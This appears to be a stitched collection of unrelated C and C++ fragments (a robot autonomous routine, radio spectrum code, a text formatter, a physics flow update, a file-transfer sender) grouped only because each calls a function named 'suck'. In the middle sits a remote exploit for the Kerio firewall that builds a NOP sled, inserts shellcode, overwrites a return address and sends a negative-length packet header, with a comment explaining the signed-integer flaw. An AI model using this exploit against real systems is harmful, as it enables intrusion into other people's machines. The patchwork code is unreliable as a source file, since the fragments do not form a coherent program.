void canned() {
printf("autonav\n\r");
//s(12);
//l(PI FR);
speed=SPEED;
s(5);
printf("point to first balls\n\r");
l(
atan((W/2)/(2+(W/2)))
FR);
suck(MAX_SPEED);
s(sqrt(pow(W/2,2)+pow(2+(W/2),2)));//go to bals
loadall(CONVEYER_SPEED);
s(7);//suck up balls
s(8);//continue
delay(50);
r((
(PI/2)
//-(PI/16)
// - atan((W/2)/(2+(W/2)))
)FR);
s(9);
suck(0);
fire(4);
load(0);
printf("done autonav\n\r");
}
PORT
void TXAGetSpecF1 (int channel, float* out)
{ // return spectrum magnitudes in dB
SIPHON a = txa[channel].sip1.p;
int i, j, mid, m, n;
EnterCriticalSection (&a->update);
a->outsize = a->fftsize;
suck (a);
LeaveCriticalSection (&a->update);
sip_spectrum (a);
mid = a->fftsize / 2;
if (a->specmode == 0)
// swap the halves of the spectrum
for (i = 0, j = mid; i < mid; i++, j++)
{
out[i] = (float)(10.0 * mlog10 (a->specout[2 * j + 0] * a->specout[2 * j + 0] + a->specout[2 * j + 1] * a->specout[2 * j + 1] + 1.0e-60));
out[j] = (float)(10.0 * mlog10 (a->specout[2 * i + 0] * a->specout[2 * i + 0] + a->specout[2 * i + 1] * a->specout[2 * i + 1] + 1.0e-60));
}
else
// mirror each half of the spectrum in-place
for (i = 0, j = mid - 1, m = mid, n = a->fftsize - 1; i < mid; i++, j--, m++, n--)
{
out[i] = (float)(10.0 * mlog10 (a->specout[2 * j + 0] * a->specout[2 * j + 0] + a->specout[2 * j + 1] * a->specout[2 * j + 1] + 1.0e-60));
out[m] = (float)(10.0 * mlog10 (a->specout[2 * n + 0] * a->specout[2 * n + 0] + a->specout[2 * n + 1] * a->specout[2 * n + 1] + 1.0e-60));
}
}
int readreq()
{
int r;
if (skipsp()) goto readend;
c = suck();
if (c == EOF) goto readend;
if (c == '\n') goto readend;
if (c == '.') {
while (1) {
c = suck();
if (c == EOF) break;
if (c == '\n') break;
}
goto readend;
}
r = c << 9;
c = suck();
if (c != EOF) {
if (c != '\n') {
r = r | c;
}
}
if (r==0157150) c = tread(ohead); /* oh */
if (r==0163160) { /* sp */
o_sp=nread();
writebreak();
}
if (r==0164141) do_ta(); /* ta */
if (r==0165154) o_ul=nread(); /* ul */
while (1) {
if (c == EOF) break;
if (c == '\n') break;
c= suck();
}
readend:
if (c != EOF)
return(1);
else
return(0);
}
int skipsp()
{
while(1) {
c= suck();
if (c==EOF) return(1);
if (c=='\n') return(1);
if (c==' ') continue;
if (c=='\t') continue;
cachec= c; /* Unget the character */
return(0);
}
}
PORT
void TXAGetaSipF (int channel, float* out, int size)
{ // return raw samples as floats
SIPHON a = txa[channel].sip1.p;
int i;
EnterCriticalSection (&a->update);
a->outsize = size;
suck (a);
LeaveCriticalSection (&a->update);
for (i = 0; i < size; i++)
{
out[i] = (float)a->sipout[2 * i + 0];
}
}
PORT
void GetaSipF1EXT (int id, float* out, int size)
{ // return raw samples as floats
SIPHON a = psiphon[id];
int i;
EnterCriticalSection (&a->update);
a->outsize = size;
suck (a);
LeaveCriticalSection (&a->update);
for (i = 0; i < size; i++)
{
out[2 * i + 0] = (float)a->sipout[2 * i + 0];
out[2 * i + 1] = (float)a->sipout[2 * i + 1];
}
}
void Flow::update()
{
if (behaviour == BEHAVIOR_SUCK) suck();
if (behaviour == BEHAVIOR_BLOW) blow();
InteractWithSphere();
#ifdef EQUILIBRIUM
FriendsEquilibrium();
SelfEquilibrium();
#endif
Decoy();
}
int nread() // OK
{
int i=0;
int f;
f = 0;
if (skipsp()==0)
while(1) {
c = suck();
if (c == EOF) break;
if (isspace(c)) break;
if (isdigit(c)) {
f++;
i = i * 10 + c - '0';
} else
break;
}
if (f==0)
i = 1;
return(i);
}
int tread(char *s) // OK
{
int leadbl=0;
while(1) {
c = suck();
if (c == ' ')
if (leadbl==0) continue;
if (c == EOF) {
*s = '\0';
return(c);
}
if (c == '\n') {
*s = '\0';
return(c);
}
*s = c;
s++;
leadbl++;
}
}
int main(int argc, char *argv[])
{
int sockfd, i,j;
struct hostent *he;
if (argc != 2) {
fprintf(stderr,"usage: ./%s hostname\n",argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
perror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { // prepare a socket for connecting
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(PORT); // short, network byte order
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
perror("connect");
exit(1);
}
fprintf(stderr,"shell len = %d\n",strlen(shellcode));
fprintf(stderr,"Connected to firewall.\n");
memset(buf,0x0,sizeof(buf));
fprintf(stderr,"Sucking buffer..\n");
suck(sockfd,266);
fprintf(stderr,"\nBuffer sucked by black hole..\n");
memset(buf,0x0,sizeof(buf));
fprintf(stderr,"-------------------------------------------------\n");
fprintf(stderr," - BANNER - \n");
fprintf(stderr,"-------------------------------------------------\n");
sleep(1);
fprintf(stderr,"coded by Burebista ([email protected])\n");
fprintf(stderr," released on - 5 Apr 2003 -\n");
sleep(2);
fprintf(stderr,"-------------------------------------------------\n");
memset(buf,0x90,MAXDATASIZE); // set nops all over
// prepares call up to beginning of buffer 32 bit=5 bytes
buf[MAXDATASIZE-1]='\xff'; //
buf[MAXDATASIZE-2]='\xff'; // call -1150
buf[MAXDATASIZE-3]='\xee'; //
buf[MAXDATASIZE-4]='\xab'; //
buf[MAXDATASIZE-5]='\xe8'; //
j=0;
for (i=900;j<strlen(shellcode);i++) buf[i]=shellcode[j++]; // insert the shellcode in buf at 900
// prepares the new return address (on XPSP1 it is CALL ESP in RPCRT4.DLL)
buf[retpos-1]='\x78';
buf[retpos-2]='\x07';
buf[retpos-3]='\x06';
buf[retpos-4]='\x90';
// this prepares packet header with negative length
buf[0]=0;
buf[1]=0;
buf[2]=0x14;
buf[3]=0xffffff9c; // negative, -100. firewall will prepare buf of that size. signed integers hit again
/*
The 4th byte in the packet is the size of what the firewall will be expecting to receive
right ahead. If we send longer buffer then what we told the firewall to expect, it will be
simply truncated and nothing cool will happen. The problem is Kerio never thought we could
tell it something that stupid like we are going to send -100 bytes, it is like expecting a
client to buy -20 books from your library, which is an absurdity. There is no checking to
make sure the user input is valid. Again, invalid trusted user input. What they should have
done is either to use the 4th byte inside a modulus, to make sure it is always positive,
either lamingly check if it is negative, and if true, stop processing the inputted data.
What's so funny?
*/
if ((send(sockfd, buf,sizeof(buf),0)) == -1 ) { // PASARAN!
perror("send");
exit(1);
}
fprintf(stderr,"..pasaran...\n");
fprintf(stderr,":D Done!\n");
close(sockfd);
}
void LLXfer::sendPacket(S32 packet_num)
{
char fdata_buf[LL_XFER_LARGE_PAYLOAD+4]; /* Flawfinder: ignore */
S32 fdata_size = mChunkSize;
BOOL last_packet = FALSE;
S32 num_copy = 0;
// if the desired packet is not in our current buffered excerpt from the file. . .
if (((U32)packet_num*fdata_size < mBufferStartOffset)
|| ((U32)llmin((U32)mXferSize,(U32)((U32)(packet_num+1)*fdata_size)) > mBufferStartOffset + mBufferLength))
{
if (suck(packet_num*fdata_size)) // returns non-zero on failure
{
abort(LL_ERR_EOF);
return;
}
}
S32 desired_read_position = 0;
desired_read_position = packet_num * fdata_size - mBufferStartOffset;
fdata_size = llmin((S32)mBufferLength-desired_read_position, mChunkSize);
if (fdata_size < 0)
{
llwarns << "negative data size in xfer send, aborting" << llendl;
abort(LL_ERR_EOF);
return;
}
if (((U32)(desired_read_position + fdata_size) >= (U32)mBufferLength) && (mBufferContainsEOF))
{
last_packet = TRUE;
}
if (packet_num)
{
num_copy = llmin(fdata_size, (S32)sizeof(fdata_buf));
num_copy = llmin(num_copy, (S32)(mBufferLength - desired_read_position));
if (num_copy > 0)
{
memcpy(fdata_buf,&mBuffer[desired_read_position],num_copy); /*Flawfinder: ignore*/
}
}
else
{
// if we're the first packet, encode size as an additional S32
// at start of data.
num_copy = llmin(fdata_size, (S32)(sizeof(fdata_buf)-sizeof(S32)));
num_copy = llmin(
num_copy,
(S32)(mBufferLength - desired_read_position));
if (num_copy > 0)
{
memcpy( /*Flawfinder: ignore*/
fdata_buf + sizeof(S32),
&mBuffer[desired_read_position],
num_copy);
}
fdata_size += sizeof(S32);
htonmemcpy(fdata_buf,&mXferSize, MVT_S32, sizeof(S32));
}
S32 encoded_packetnum = encodePacketNum(packet_num,last_packet);
if (fdata_size)
{
// send the packet
gMessageSystem->newMessageFast(_PREHASH_SendXferPacket);
gMessageSystem->nextBlockFast(_PREHASH_XferID);
gMessageSystem->addU64Fast(_PREHASH_ID, mID);
gMessageSystem->addU32Fast(_PREHASH_Packet, encoded_packetnum);
gMessageSystem->nextBlockFast(_PREHASH_DataPacket);
gMessageSystem->addBinaryDataFast(_PREHASH_Data, &fdata_buf,fdata_size);
gMessageSystem->sendMessage(mRemoteHost);
ACKTimer.reset();
mWaitingForACK = TRUE;
}
if (last_packet)
{
mStatus = e_LL_XFER_COMPLETE;
}
else
{
mStatus = e_LL_XFER_IN_PROGRESS;
}
}
int readline()
{
int startline;
int doingword;
isrequest = 0;
startline = 1;
doingword = 0;
c = suck();
if (c == '\n') {
o_sp = 1;
writebreak();
goto out;
} else if (isspace(c))
writebreak();
while(1) {
if (c == EOF) {
if (doingword) bumpword();
break;
}
if (isspace(c)) {
if (doingword == 0) {
startline = 0;
if (c==' ') {
assyline[assylen] = ' ';
assylen++;
}
if (c=='\t') {
tabulate();
}
if (c=='\n') goto out;
c = suck();
continue;
}
}
if (isspace(c)) {
if (doingword) {
bumpword();
if (c == '\t')
tabulate();
else if (assylen) {
assyline[assylen] = ' ';
assylen++;
}
doingword = 0;
if (c == '\n') break;
}
}
if (isspace(c) == 0) {
if (doingword) {
if (o_ul)
*holdp = c | UNDERL;
else
*holdp = c;
holdp++;
goto readline1;
}
if (startline) {
if (c == o_cc) {
isrequest = 1;
return(readreq());
}
}
doingword = 1;
holdp = holdword;
if (o_ul)
*holdp = c | UNDERL;
else
*holdp = c;
holdp++;
}
readline1:
startline = 0;
c = suck();
}
out:
if (o_ul) o_ul--;
if (c != EOF)
return(1);
else
return(0);
}
